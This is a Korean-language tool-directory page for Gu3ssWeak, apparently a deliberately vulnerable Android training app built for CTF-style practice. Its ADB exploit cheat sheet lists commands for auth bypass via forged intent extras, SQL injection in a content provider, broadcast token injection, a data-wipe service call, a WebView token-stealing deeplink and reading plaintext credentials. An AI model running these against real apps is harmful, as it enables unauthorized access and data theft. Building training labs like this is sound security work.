Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Gu3ssWeak — 모바일 보안 연구 및 버그 바운티 실습을 위한 의도적으로 취약한 Android 앱 - OWASP Mobile Top 10 | Kitploit
도구/GitHubGitHub/b4sith-sec/gu3ssweak
Android SecurityVulnerability AnalysisMobile App PentestingWeb Application ExploitationCTFPenetration TestingMobile SecurityLearning & EducationLearning Paths & CoursesLabs & Practice
GitHub
82169일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
b4sith-sec/gu3ssweak

Gu3ssWeak

모바일 보안 연구 및 버그 바운티 실습을 위한 의도적으로 취약한 Android 앱 - OWASP Mobile Top 10

저장소 보기

Gu3ssWeak

모바일 보안 연구, 버그 바운티 실습, 그리고 CTF 스타일 학습을 위한 의도적으로 취약하게 만든 Android 애플리케이션입니다. OWASP Mobile Top 10에 매핑된 21개의 문서화된 취약점을 포함하고 있습니다.


빠른 시작

git clone [email protected]:b4sith-sec/Gu3ssWeak.git
cd Gu3ssWeak
./gradlew assembleDebug
adb install -r app/build/outputs/apk/debug/app-debug.apk

앱을 실행하고, 각 랩을 하나씩 풀어가며 플래그를 획득한 뒤, 앱 내 CTF 스코어보드에 제출하세요.


랩 카테고리

카테고리취약점플래그
WebViewWV-01 ~ WV-055
DeeplinkDL-01 ~ DL-04, DL-CHAIN5
인증 / SQL 인젝션SQL-011
관리자 패널AP-01 ~ AP-042
ContentProviderCP-011
Broadcast ReceiverBR-01 ~ BR-032
ServiceSV-01, SV-02a, SV-02b2
네트워크 가로채기NET-011
뱅킹 / OTPOTP-011
LFILFI-011
저장소STORE-011
XSSXSS-01, XSS-022

총 20개의 플래그가 있으며, 모두 획득하면 마스터 플래그가 주어집니다.


스크린샷

랩 목록CTF 스코어보드
lab

CTF 흐름

  1. 앱을 엽니다 - 바로 랩 목록 화면으로 이동합니다.
  2. 랩을 선택하고 취약점을 익스플로잇합니다 (UI, ADB, 또는 둘 다 사용).
  3. 각 익스플로잇이 성공하면 해당 플래그가 자동으로 캡처됩니다.
  4. "Submit Flag"를 눌러 확인하거나, "CTF Scoreboard"에서 진행 상황을 확인합니다.
  5. 18개의 플래그를 모두 캡처하면 마스터 플래그가 잠금 해제됩니다.

문서

  • ARCHITECTURE.md - 각 취약한 컴포넌트가 내부적으로 어떻게 동작하는지 설명
  • MITIGATIONS.md - LFI에서 RCE로의 확장 개념을 포함한 모든 취약점에 대한 수정 및 완화 지침
  • SECURITY.md - 보안 정책 및 책임 있는 공개
  • CHECKSUMS.txt - 빌드된 APK의 SHA256 체크섬

ADB 익스플로잇 치트시트

# 관리자 패널 - exported, 권한 없음
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity

관리자 패널 - 위조된 intent extra로 "수정된" 인증 검사 우회

adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity --ez is_authenticated true

ContentProvider grant 우회 - 괄호 탈출로 단일 행 grant를 벗어남

adb shell "content query --uri content://com.gu3sswe4k.app.contacts/contacts/1 --where \"1) OR (1=1\""

# 브로드캐스트를 통한 토큰 주입
adb shell am broadcast -a com.gu3sswe4k.app.SEND_TOKEN --es token FAKE --es user attacker

# exported 서비스를 통한 데이터 삭제
adb shell am startservice -n com.gu3sswe4k.app/.services.DataSyncService --es action wipe_user_data

# WebView RCE 체인으로 가는 Deeplink
adb shell am start -a android.intent.action.VIEW -d "vulndroid://settings?redirect=com.gu3sswe4k.app.activities.WebViewActivity&url=javascript:VulnBridge.stealToken()"

# 평문으로 저장된 자격 증명 읽기
adb shell run-as com.gu3sswe4k.app cat /data/data/com.gu3sswe4k.app/shared_prefs/login_prefs.xml

# 로그에 남는 시크릿 감시
adb logcat | grep Gu3ssWeak

면책 조항

이 프로젝트는 순전히 교육 목적입니다. 모든 취약점은 의도적이며 문서화되어 있습니다. 여기에 소개된 기법은 실제 앱에도 적용되지만, 본인이 소유하거나 테스트 권한을 부여받은 시스템에서만 테스트하세요. 전체 면책 조항 및 책임 있는 공개 지침은 SECURITY.md를 참조하세요.

라이선스

MIT - LICENSE를 참조하세요.

도구 다운로드